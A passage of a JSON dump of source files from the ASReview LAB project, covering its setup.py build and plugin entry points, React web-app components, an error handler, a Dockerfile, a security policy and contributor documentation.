[\"gensim\"],\n \"tensorflow\": [\"tensorflow~=2.0\"],\n \"dev\": [\"black\", \"check-manifest\", \"flake8\", \"flake8-isort\", \"isort\"],\n \"test\": [\"coverage\", \"pytest\", \"pytest-random-order\"],\n}\nDEPS[\"all\"] = DEPS[\"sbert\"] + DEPS[\"doc2vec\"]\nDEPS[\"all\"] += DEPS[\"tensorflow\"]\n\n\nclass CompileAssets(Command):\n \"\"\"\n Compile and build the frontend assets using npm and webpack.\n\n Registered as cmdclass in setup() so it can be called with\n ``python setup.py compile_assets``.\n \"\"\"\n\n description = \"Compile and build the frontend assets\"\n user_options = []\n\n def initialize_options(self):\n \"\"\"Set default values for options.\"\"\"\n\n def finalize_options(self):\n \"\"\"Set final values for options.\"\"\"\n\n def run(self):\n \"\"\"Run a command to compile and build assets.\"\"\"\n\n path_webapp = Path(__file__).parent / \"asreview\" / \"webapp\"\n\n subprocess.check_call(\n [\"npm\", \"install\"],\n cwd=str(path_webapp),\n shell=(platform.system() == \"Windows\")\n )\n subprocess.check_call(\n [\"npm\", \"run-script\", \"build\"],\n cwd=str(path_webapp),\n shell=(platform.system() == 'Windows')\n )\n\n\ndef get_cmdclass():\n cmdclass = versioneer.get_cmdclass()\n cmdclass[\"compile_assets\"] = CompileAssets\n return cmdclass\n\n\nsetup(\n name=\"asreview\",\n version=versioneer.get_version(),\n cmdclass=get_cmdclass(),\n description=\"ASReview LAB - A tool for AI-assisted systematic reviews\",\n long_description=get_long_description(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/asreview/asreview\",\n author=\"ASReview LAB developers\",\n author_email=\"[email protected]\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Text Processing :: General\",\n \"Framework :: Flask\",\n ],\n keywords=[\"systematic review\", \"machine-learning\"],\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests\"]),\n package_data={\n \"asreview\": [\n \"webapp/build/*\",\n \"webapp/build/static/*/*\",\n ]\n },\n python_requires=\"~=3.8\",\n install_requires=REQUIRES,\n extras_require=DEPS,\n entry_points={\n \"console_scripts\": [\n \"asreview=asreview.__main__:main\",\n ],\n \"asreview.entry_points\": [\n \"lab=asreview.entry_points:LABEntryPoint\",\n \"web_run_model=asreview.entry_points:WebRunModelEntryPoint\",\n \"simulate=asreview.entry_points:SimulateEntryPoint\",\n \"algorithms=asreview.entry_points:AlgorithmsEntryPoint\",\n \"state-inspect=asreview.entry_points:StateInspectEntryPoint\",\n \"auth-tool=asreview.entry_points:AuthTool\",\n ],\n \"asreview.readers\": [\n \".csv = asreview.io:CSVReader\",\n \".tab = asreview.io:CSVReader\",\n \".tsv = asreview.io:CSVReader\",\n \".ris = asreview.io:RISReader\",\n \".txt = asreview.io:RISReader\",\n \".xlsx = asreview.io:ExcelReader\",\n ],\n \"asreview.writers\": [\n \".csv = asreview.io:CSVWriter\",\n \".tab = asreview.io:TSVWriter\",\n \".tsv = asreview.io:TSVWriter\",\n \".ris = asreview.io:RISWriter\",\n \".txt = asreview.io:RISWriter\",\n \".xlsx = asreview.io:ExcelWriter\",\n ],\n \"asreview.datasets\": [\n \"benchmark = asreview.datasets:BenchmarkDataGroup\",\n \"benchmark-nature = asreview.datasets:NaturePublicationDataGroup\",\n \"synergy = asreview.datasets:SynergyDataGroup\"\n ],\n \"asreview.models.classifiers\": [\n \"svm = asreview.models.classifiers:SVMClassifier\",\n \"nb = asreview.models.classifiers:NaiveBayesClassifier\",\n \"rf = asreview.models.classifiers:RandomForestClassifier\",\n \"nn-2-layer = asreview.models.classifiers:NN2LayerClassifier\",\n \"logistic = asreview.models.classifiers:LogisticClassifier\",\n \"lstm-base = asreview.models.classifiers:LSTMBaseClassifier\",\n \"lstm-pool = asreview.models.classifiers:LSTMPoolClassifier\",\n ],\n \"asreview.models.feature_extraction\": [\n \"doc2vec = asreview.models.feature_extraction:Doc2Vec\",\n \"embedding-idf = asreview.models.feature_extraction:EmbeddingIdf\",\n \"embedding-lstm = asreview.models.feature_extraction:EmbeddingLSTM\",\n \"sbert = asreview.models.feature_extraction:SBERT\",\n \"tfidf = asreview.models.feature_extraction:Tfidf\",\n ],\n \"asreview.models.balance\": [\n \"simple = asreview.models.balance:SimpleBalance\",\n \"double = asreview.models.balance:DoubleBalance\",\n # \"triple = asreview.models.balance:TripleBalance\", # Broken, only via API\n \"undersample = asreview.models.balance:UndersampleBalance\",\n ],\n \"asreview.models.query\": [\n \"max = asreview.models.query.max:MaxQuery\",\n \"random = asreview.models.query.random:RandomQuery\",\n \"uncertainty = asreview.models.query.uncertainty:UncertaintyQuery\",\n \"cluster = asreview.models.query.cluster:ClusterQuery\",\n \"max_random = asreview.models.query.mixed:MaxRandomQuery\",\n \"max_uncertainty = asreview.models.query.mixed:MaxUncertaintyQuery\",\n ],\n },\n project_urls={\n \"Bug Reports\": \"https://github.com/asreview/asreview/issues\",\n \"Source\": \"https://github.com/asreview/asreview/\",\n },\n)\n" }, { "alpha_fraction": 0.7115384340286255, "alphanum_fraction": 0.7115384340286255, "avg_line_length": 51, "blob_id": "f0e0244070bffcee57c443904c52f2fe6030bbc7", "content_id": "20818fcaf61f47400c91b89181f1ca4db5b91113", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 52, "license_type": "permissive", "max_line_length": 51, "num_lines": 1, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/ModelComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as ModelForm } from \"./ModelForm\";\n" }, { "alpha_fraction": 0.6292714476585388, "alphanum_fraction": 0.637653112411499, "avg_line_length": 32, "blob_id": "a4cea6a471d6a1a8df93d09a27b95679d6b3caf1", "content_id": "adf474afeaeb31abab31afcc5f674741a86584b7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1551, "license_type": "permissive", "max_line_length": 74, "num_lines": 47, "path": "/asreview/io/tsv_writer.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nclass TSVWriter:\n \"\"\"TSV file writer.\"\"\"\n\n name = \"tsv\"\n label = \"TSV (UTF-8)\"\n write_format = \".tsv\"\n\n @classmethod\n def write_data(cls, df, fp, sep=\"\\t\", labels=None, ranking=None):\n \"\"\"Export dataset.\n\n Arguments\n ---------\n df: pandas.Dataframe\n Dataframe of all available record data.\n fp: str, NoneType\n Filepath or None for buffer.\n sep: str\n Seperator of the file.\n labels: list, numpy.ndarray\n Current labels will be overwritten by these labels\n (including unlabelled). No effect if labels is None.\n ranking: list\n Reorder the dataframe according to these (internal) indices.\n Default ordering if ranking is None.\n\n Returns\n -------\n TSV file\n Dataframe of all available record data.\n \"\"\"\n return df.to_csv(fp, sep=sep, index=True)\n" }, { "alpha_fraction": 0.5072187185287476, "alphanum_fraction": 0.5088891386985779, "avg_line_length": 30.272388458251953, "blob_id": "36e54372e29612483f6dc01b265ee96d7b77dac3", "content_id": "3b4459fae8a9157f49e8c4bd0dbdf42e118fd5cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8381, "license_type": "permissive", "max_line_length": 80, "num_lines": 268, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/ProfilePage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useNavigate, useSearchParams } from \"react-router-dom\";\nimport { useMutation, useQuery } from \"react-query\";\nimport DashboardPage from \"./DashboardPage\";\nimport {\n Box,\n Checkbox,\n FormControl,\n FormControlLabel,\n FormHelperText as FHT,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\n\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport {\n TypographyH5Medium,\n TypographyH6Medium,\n} from \"../../StyledComponents/StyledTypography.js\";\nimport { InlineErrorHandler } from \"../../Components\";\nimport { useToggle } from \"../../hooks/useToggle\";\n\nimport { AuthAPI } from \"../../api\";\nimport { useFormik } from \"formik\";\nimport * as Yup from \"yup\";\n\n// VALIDATION SCHEMA\nconst SignupSchema = Yup.object().shape({\n email: Yup.string().email(\"Invalid email\").required(\"Email is required\"),\n name: Yup.string().required(\"Full name is required\"),\n affiliation: Yup.string()\n .min(2, \"Affiliation must be at least 2 characters long\")\n .nullable(),\n password: Yup.string().matches(\n /^(?=.*[A-Za-z])(?=.*\\d)(?=.*[@$!%*?&#])[A-Za-z\\d@$!%*?&#]{8,}$/,\n \"Use 8 or more characters with a mix of letters, numbers & symbols\",\n ),\n confirmPassword: Yup.string().oneOf(\n [Yup.ref(\"password\"), null],\n \"Passwords must match\",\n ),\n});\n\nconst ProfilePage = (props) => {\n const navigate = useNavigate();\n\n const [showPassword, toggleShowPassword] = useToggle();\n const [loadingSaveButton, setLoadingSaveButton] = React.useState(true);\n const [showPasswordFields, setShowPasswordFields] = React.useState(false);\n const [searchParams] = useSearchParams();\n const showFirstTimeMessage = searchParams.get(\"first_time\");\n\n const { error, isError, mutate } = useMutation(AuthAPI.updateProfile, {\n onSuccess: () => {\n navigate(\"/projects\");\n },\n });\n\n const handleSubmit = () => {\n if (formik.isValid) {\n mutate(formik.values);\n }\n };\n\n const initialValues = {\n email: \"\",\n name: \"\",\n affiliation: \"\",\n password: \"\",\n confirmPassword: \"\",\n publicAccount: true,\n };\n\n const formik = useFormik({\n initialValues: initialValues,\n validationSchema: SignupSchema,\n });\n\n const { data, isFetched } = useQuery(\"fetchProfileData\", AuthAPI.getProfile, {\n onSuccess: (data) => {\n formik.setFieldValue(\"email\", data.message.email, true);\n formik.setFieldValue(\"name\", data.message.name, true);\n formik.setFieldValue(\n \"affiliation\",\n data.message.affiliation || \"\",\n false,\n );\n formik.setFieldValue(\"public\", data.message.public || true);\n // show password field?\n if (data.message.origin === \"asreview\") {\n setShowPasswordFields(true);\n } else {\n setShowPasswordFields(false);\n }\n // stop spinner in button\n setLoadingSaveButton(false);\n },\n onError: (err) => {\n console.log(\"Did not fetch profile data from backend\", err);\n },\n });\n\n const returnType = () => {\n return !showPassword ? \"password\" : \"text\";\n };\n\n const renderPasswordFields = (formik) => {\n return (\n <>\n <FormControl>\n <Stack direction=\"row\" spacing={2}>\n <TextField\n id=\"password\"\n label=\"Change Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n value={formik.values.password}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n <TextField\n id=\"confirmPassword\"\n label=\"Confirm Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n value={formik.values.confirmPassword}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n </Stack>\n </FormControl>\n {formik.touched.password && formik.errors.password ? (\n <FHT error={true}>{formik.errors.password}</FHT>\n ) : null}\n {formik.touched.confirmPassword && formik.errors.confirmPassword ? (\n <FHT error={true}>{formik.errors.confirmPassword}</FHT>\n ) : null}\n <FormControl>\n <FormControlLabel\n control={\n <Checkbox\n id=\"public\"\n color=\"primary\"\n onChange={toggleShowPassword}\n />\n }\n label=\"Show password\"\n />\n </FormControl>\n </>\n );\n };\n\n return (\n <DashboardPage>\n {data && isFetched && (\n <>\n {/* Header */}\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Profile</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Profile</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <span>\n <LoadingButton\n /*disabled={!formik.isValid}*/\n loading={loadingSaveButton}\n variant=\"contained\"\n onClick={handleSubmit}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Save\n </LoadingButton>\n </span>\n </Stack>\n </Box>\n </Box>\n\n {/* Page body */}\n <Box className=\"main-page-body-wrapper\">\n <Stack className=\"main-page-body\" direction={\"column\"} spacing={3}>\n {showFirstTimeMessage && (\n <TypographyH6Medium>\n Please take a second to review your profile data:\n </TypographyH6Medium>\n )}\n <TextField\n autoFocus\n id=\"email\"\n label=\"Email\"\n size=\"small\"\n fullWidth\n value={formik.values.email}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.email && formik.errors.email ? (\n <FHT error={true}>{formik.errors.email}</FHT>\n ) : null}\n <TextField\n id=\"name\"\n label=\"Full name\"\n size=\"small\"\n fullWidth\n value={formik.values.name}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.name && formik.errors.name ? (\n <FHT error={true}>{formik.errors.name}</FHT>\n ) : null}\n <TextField\n id=\"affiliation\"\n label=\"Affiliation\"\n size=\"small\"\n fullWidth\n value={formik.values.affiliation}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.affiliation && formik.errors.affiliation ? (\n <FHT error={true}>{formik.errors.affiliation}</FHT>\n ) : null}\n {showPasswordFields && renderPasswordFields(formik)}\n {false && (\n <>\n <FormControlLabel\n control={\n <Checkbox\n color=\"primary\"\n id=\"publicAccount\"\n defaultChecked={formik.values.publicAccount}\n value={formik.values.publicAccount}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n }\n label=\"Make this account public\"\n />\n <FHT>\n Making this account public allows you to collaborate.\n </FHT>\n </>\n )}\n {isError && (\n <FHT>\n <InlineErrorHandler message={error.message} />\n </FHT>\n )}\n </Stack>\n </Box>\n </>\n )}\n </DashboardPage>\n );\n};\n\nexport default ProfilePage;\n" }, { "alpha_fraction": 0.7892720103263855, "alphanum_fraction": 0.7969348430633545, "avg_line_length": 28, "blob_id": "bff04a40a2f7a423545a579265b176149b0f693c", "content_id": "7817475937668995cded34383540147d58f460de", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 261, "license_type": "permissive", "max_line_length": 94, "num_lines": 9, "path": "/SECURITY.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Security Policy\n\n## Supported Versions\n\nVersion 1 or later of ASReview LAB receives security updates. Version 0.x is not supported. \n\n## Reporting a Vulnerability\n\nPlease report vulnerabilities at https://github.com/asreview/asreview/security/advisories/new.\n" }, { "alpha_fraction": 0.5895061492919922, "alphanum_fraction": 0.5987654328346252, "avg_line_length": 26, "blob_id": "aea317a43e35ca45e5b73d1cb3504e35e6d5eb2e", "content_id": "b04f0a71a8a378a9ed3ad5ead210fc404e4892c3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 648, "license_type": "permissive", "max_line_length": 66, "num_lines": 24, "path": "/asreview/webapp/src/api/axiosErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "const axiosErrorHandler = (error) => {\n let api_error = {};\n\n if (error.response) {\n if (error.response.data[\"message\"]) {\n api_error[\"code\"] = error.response[\"status\"];\n api_error[\"message\"] = error.response.data[\"message\"];\n } else {\n api_error[\"code\"] = 500;\n api_error[\"message\"] = \"Whoops, something went wrong.\";\n }\n } else if (error.request) {\n api_error[\"code\"] = 503;\n api_error[\"message\"] =\n \"Failed to connect to server. Please restart the software.\";\n } else {\n api_error[\"message\"] = \"Unexpected error.\";\n console.log(error);\n }\n\n return api_error;\n};\n\nexport { axiosErrorHandler };\n" }, { "alpha_fraction": 0.5570297241210938, "alphanum_fraction": 0.5591697096824646, "avg_line_length": 27.150602340698242, "blob_id": "e3e8760172563304405d04e7b341abadcf0ae890", "content_id": "185d1222cb65926d5b03e286e0ce37a2ca6eeaeb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4673, "license_type": "permissive", "max_line_length": 86, "num_lines": 166, "path": "/asreview/webapp/src/Components/NavigationDrawer.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { connect } from \"react-redux\";\nimport { useNavigate, Outlet } from \"react-router-dom\";\nimport {\n Box,\n ButtonBase,\n CardMedia,\n Drawer,\n IconButton,\n Toolbar,\n} from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\nimport { Menu } from \"@mui/icons-material\";\n\nimport { DrawerItemContainer, Header } from \"../Components\";\n\nimport ASReviewLAB_black from \"../images/asreview_sub_logo_lab_black_transparent.svg\";\nimport ASReviewLAB_white from \"../images/asreview_sub_logo_lab_white_transparent.svg\";\nimport { drawerWidth } from \"../globals.js\";\nimport { toggleHelpDialog } from \"../redux/actions\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst mapDispatchToProps = (dispatch) => {\n return {\n toggleHelpDialog: () => {\n dispatch(toggleHelpDialog());\n },\n };\n};\n\nconst openedMixin = (theme) => ({\n width: drawerWidth,\n transition: theme.transitions.create(\"width\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.enteringScreen,\n }),\n overflowX: \"hidden\",\n});\n\nconst closedMixin = (theme) => ({\n transition: theme.transitions.create(\"width\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.leavingScreen,\n }),\n overflowX: \"hidden\",\n width: `calc(${theme.spacing(7)} + 1px)`,\n [theme.breakpoints.up(\"sm\")]: {\n width: `calc(${theme.spacing(9)} + 1px)`,\n },\n});\n\nconst NavigationRail = styled(Drawer, {\n shouldForwardProp: (prop) => prop !== \"open\",\n})(({ theme, open }) => ({\n width: drawerWidth,\n flexShrink: 0,\n whiteSpace: \"nowrap\",\n boxSizing: \"border-box\",\n ...(open && {\n ...openedMixin(theme),\n \"& .MuiDrawer-paper\": openedMixin(theme),\n }),\n ...(!open && {\n ...closedMixin(theme),\n \"& .MuiDrawer-paper\": closedMixin(theme),\n }),\n}));\n\nconst NavigationDrawer = (props) => {\n const { window } = props;\n const navigate = useNavigate();\n const theme = useTheme();\n\n const wordmarkState = () => {\n if (theme.palette.mode === \"dark\") {\n return ASReviewLAB_white;\n } else {\n return ASReviewLAB_black;\n }\n };\n\n const container =\n window !== undefined ? () => window().document.body : undefined;\n\n return (\n <Root>\n <Header toggleNavDrawer={props.toggleNavDrawer} />\n <Box\n component=\"nav\"\n aria-label=\"navigation drawer\"\n sx={{ width: { sm: drawerWidth }, flexShrink: { sm: 0 } }}\n >\n {/* Temporary drawer on mobile screen */}\n <Drawer\n container={container}\n variant=\"temporary\"\n open={props.mobileScreen && props.onNavDrawer}\n onClose={props.toggleNavDrawer}\n ModalProps={{\n keepMounted: true, // Better open performance on mobile.\n }}\n sx={{\n display: { xs: \"block\", md: \"none\" },\n \"& .MuiDrawer-paper\": {\n boxSizing: \"border-box\",\n width: drawerWidth,\n },\n }}\n >\n <Toolbar>\n <IconButton\n edge=\"start\"\n color=\"inherit\"\n onClick={props.toggleNavDrawer}\n size=\"large\"\n sx={{ marginRight: \"4px\" }}\n >\n <Menu />\n </IconButton>\n <ButtonBase disableRipple>\n <CardMedia\n component=\"img\"\n src={wordmarkState()}\n alt=\"ASReview LAB Dashboard\"\n onClick={() => {\n props.toggleNavDrawer();\n navigate(\"/\");\n }}\n sx={{ width: 130 }}\n />\n </ButtonBase>\n </Toolbar>\n <DrawerItemContainer\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n toggleSettings={props.toggleSettings}\n toggleHelpDialog={props.toggleHelpDialog}\n />\n </Drawer>\n\n {/* Permanent drawer on desktop screen */}\n <NavigationRail\n variant=\"permanent\"\n open={props.onNavDrawer}\n sx={{\n display: { xs: \"none\", md: \"block\" },\n }}\n >\n <Toolbar />\n <DrawerItemContainer\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n toggleSettings={props.toggleSettings}\n toggleHelpDialog={props.toggleHelpDialog}\n />\n </NavigationRail>\n </Box>\n <Outlet />\n </Root>\n );\n};\n\nexport default connect(null, mapDispatchToProps)(NavigationDrawer);\n" }, { "alpha_fraction": 0.5506691932678223, "alphanum_fraction": 0.5544933080673218, "avg_line_length": 22.772727966308594, "blob_id": "e62ee2110661beda3307a16c5b8f8056eb8ba8b1", "content_id": "7fb911be2e421827fbe28860e11027b01d33a547", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 523, "license_type": "permissive", "max_line_length": 66, "num_lines": 22, "path": "/asreview/webapp/src/ProjectComponents/SelectItem.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Typography } from \"@mui/material\";\n\nexport default function SelectItem(props) {\n return (\n <Box>\n <Typography className=\"typography-wrap\" variant=\"subtitle1\">\n {props.primary}\n </Typography>\n {props.secondary && (\n <Typography\n className=\"typography-wrap\"\n variant=\"body2\"\n gutterBottom\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondary}\n </Typography>\n )}\n </Box>\n );\n}\n" }, { "alpha_fraction": 0.69486403465271, "alphanum_fraction": 0.7190332412719727, "avg_line_length": 24.461538314819336, "blob_id": "44951f50bcc1444a1408bce0d2189787a5311ce5", "content_id": "60dbf5e964f262a1db2e80b5767e9a8f60d70662", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 662, "license_type": "permissive", "max_line_length": 98, "num_lines": 26, "path": "/Dockerfile", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# First stage\nFROM python:3.8-slim AS builder\nWORKDIR /app\n\n# Copy and build asreview\n# git is used by versioneer to define the project version\nCOPY . /app\nRUN apt-get update \\\n && apt-get install -y git npm \\\n && pip3 install --upgrade pip setuptools \\\n && python3 setup.py compile_assets \\\n && pip3 install --user . \\\n && pip3 install --user asreview-datatools asreview-insights asreview-makita asreview-wordcloud\n\n# Second stage\nFROM python:3.8-slim\nWORKDIR /app\n\nCOPY --from=builder /root/.local /root/.local\n\nENV ASREVIEW_HOST=0.0.0.0\nENV PATH=/root/.local/bin:$PATH\nENV ASREVIEW_PATH=/app/project_folder\nEXPOSE 5000\n\nENTRYPOINT [\"asreview\"]\n" }, { "alpha_fraction": 0.5116863250732422, "alphanum_fraction": 0.5273324251174927, "avg_line_length": 25.27918815612793, "blob_id": "e5d5e8b11feb001afbb56a3cd4f39553f84b2cad", "content_id": "af5ba818642159011db22aaf0a6e6b283e8f2f85", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5177, "license_type": "permissive", "max_line_length": 78, "num_lines": 197, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ProgressChart.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport Chart from \"react-apexcharts\";\nimport { Card, CardContent } from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\n\nimport { projectModes } from \"../../globals\";\n\nconst PREFIX = \"ProgressChart\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n};\n\nconst StyledCard = styled(Card)(({ theme }) => ({\n borderRadius: 16,\n maxWidth: 960,\n overflow: \"visible\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n paddingTop: 24,\n paddingLeft: 32,\n paddingRight: 32,\n },\n}));\n\nexport default function ProgressChart(props) {\n const theme = useTheme();\n\n const n_included = props.progressQuery.data\n ? props.progressQuery.data[\"n_included\"]\n : null;\n const n_excluded = props.progressQuery.data\n ? props.progressQuery.data[\"n_excluded\"]\n : null;\n const n_papers = props.progressQuery.data\n ? props.progressQuery.data[\"n_papers\"]\n : null;\n\n const formattedTotal = React.useCallback(() => {\n if (props.mode !== projectModes.SIMULATION || !props.isSimulating) {\n return n_papers ? n_papers.toLocaleString(\"en-US\") : 0;\n } else {\n return (\n Math.round(((n_included + n_excluded) / n_papers) * 10000) / 100 + \"%\"\n );\n }\n }, [props.isSimulating, props.mode, n_included, n_excluded, n_papers]);\n\n /**\n * Chart data array\n */\n const seriesArray = React.useCallback(() => {\n if (n_included && n_excluded && n_papers) {\n return [\n Math.round(((n_included + n_excluded) / n_papers) * 10000) / 100,\n Math.round((n_included / n_papers) * 10000) / 100,\n ];\n } else {\n return [];\n }\n }, [n_included, n_excluded, n_papers]);\n\n /**\n * Chart options\n */\n const optionsChart = React.useCallback(() => {\n return {\n chart: {\n animations: {\n enabled: false,\n },\n background: \"transparent\",\n id: \"ASReviewLABprogressChart\",\n type: \"radialBar\",\n },\n plotOptions: {\n radialBar: {\n hollow: {\n margin: 15,\n size: \"60%\",\n },\n dataLabels: {\n name: {\n fontSize: \"22px\",\n },\n value: {\n fontSize: !props.mobileScreen\n ? theme.typography.h5.fontSize\n : theme.typography.h6.fontSize,\n fontFamily: !props.mobileScreen\n ? theme.typography.h5.fontFamily\n : theme.typography.h6.fontFamily,\n fontWeight: theme.typography.fontWeightBold,\n },\n total: {\n show: true,\n label:\n props.mode !== projectModes.SIMULATION || !props.isSimulating\n ? \"Total records\"\n : \"Simulation progress\",\n fontSize: !props.mobileScreen\n ? theme.typography.subtitle1.fontSize\n : theme.typography.subtitle2.fontSize,\n fontFamily: !props.mobileScreen\n ? theme.typography.subtitle1.fontFamily\n : theme.typography.subtitle2.fontFamily,\n color: theme.palette.text.secondary,\n formatter: formattedTotal,\n },\n },\n },\n },\n colors: [\n theme.palette.mode === \"light\"\n ? theme.palette.secondary.light\n : theme.palette.secondary.main,\n theme.palette.mode === \"light\"\n ? theme.palette.primary.light\n : theme.palette.primary.main,\n ],\n dataLabels: {\n enabled: false,\n },\n labels: [\"Labeled\", \"Relevant\"],\n legend: {\n show: true,\n position: \"bottom\",\n fontSize: !props.mobileScreen ? \"14px\" : \"12px\",\n fontFamily: theme.typography.subtitle2.fontFamily,\n fontWeight: theme.typography.subtitle2.fontWeight,\n labels: {\n colors: theme.palette.text.secondary,\n },\n markers: {\n width: 8,\n height: 8,\n offsetX: -4,\n },\n itemMargin: {\n horizontal: 16,\n },\n },\n fill: {\n type: \"gradient\",\n gradient: {\n shade: \"light\",\n type: \"horizontal\",\n shadeIntensity: 0,\n inverseColors: true,\n opacityFrom: 0.7,\n opacityTo: 0.9,\n stops: [0, 100],\n },\n },\n markers: {\n size: 0,\n },\n noData: {\n text: \"No data available\",\n },\n stroke: {\n lineCap: \"round\",\n },\n theme: {\n mode: theme.palette.mode,\n },\n };\n }, [\n theme,\n formattedTotal,\n props.mobileScreen,\n props.mode,\n props.isSimulating,\n ]);\n\n const [series, setSeries] = React.useState(seriesArray());\n const [options, setOptions] = React.useState({});\n\n React.useEffect(() => {\n setSeries(seriesArray());\n setOptions(optionsChart());\n }, [seriesArray, optionsChart]);\n\n return (\n <StyledCard elevation={2}>\n <CardContent className={classes.root}>\n <Chart\n options={options}\n series={series}\n type=\"radialBar\"\n height={350}\n width=\"100%\"\n />\n </CardContent>\n </StyledCard>\n );\n}\n" }, { "alpha_fraction": 0.7528328895568848, "alphanum_fraction": 0.7528328895568848, "avg_line_length": 44.41935348510742, "blob_id": "bf014fc38b4703da4b307d580c24bba0a57963fe", "content_id": "2c53b06fb41ccdd93e53be4a831a93719fa4e864", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1412, "license_type": "permissive", "max_line_length": 396, "num_lines": 31, "path": "/docs/source/contribute.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Support\n-------\n\nQuestions can be asked on `GitHub Discussions <https://github.com/asreview/asreview/discussions>`__. For bug reports and feature requests, please submit an issue on `GitHub <https://github.com/asreview/asreview/issues/new/choose>`__.\n\nDonate\n~~~~~~\n\nThe ASReview software is Free and Open Source Software (FOSS). To support the\ndevelopment, you can donate on the `ASReview donation page\n<https://asreview.ai/donate/>`_. Even small donations are highly appreciated!\n\n\nCollaborate\n~~~~~~~~~~~\n\nIf you are interested in (scientific) collaboration, `contact\nProf. Dr. Rens van de Schoot <https://www.rensvandeschoot.com/contact/>`_ or send an email to [email protected].\n\n\nContribute\n~~~~~~~~~~\n\nHow do you go from user to contributor? There are many ways to join in, and it might be less complicated than you expect. In a `blogpost <https://asreview.nl/blog/open-source-and-research/>`_, we list some easy examples for first-time contributors, for example sharing your experiences or answering user questions on the `Discussion platform <https://github.com/asreview/asreview/discussions>`_. \n\nSpecific instructions for code-contributing are available on `Github <https://github.com/asreview/asreview/blob/master/CONTRIBUTING.md>`_ as well as instructions for `developers <https://github.com/asreview/asreview/blob/master/DEVELOPMENT.md>`_.\n\n\n.. note::\n\n\tAll contributions, small or large, are very much appreciated!\n\n\n\n\n" }, { "alpha_fraction": 0.7383720874786377, "alphanum_fraction": 0.7383720874786377, "avg_line_length": 56.33333206176758, "blob_id": "5322096d8560d191065d6f0ddeef1cddb4d1614a", 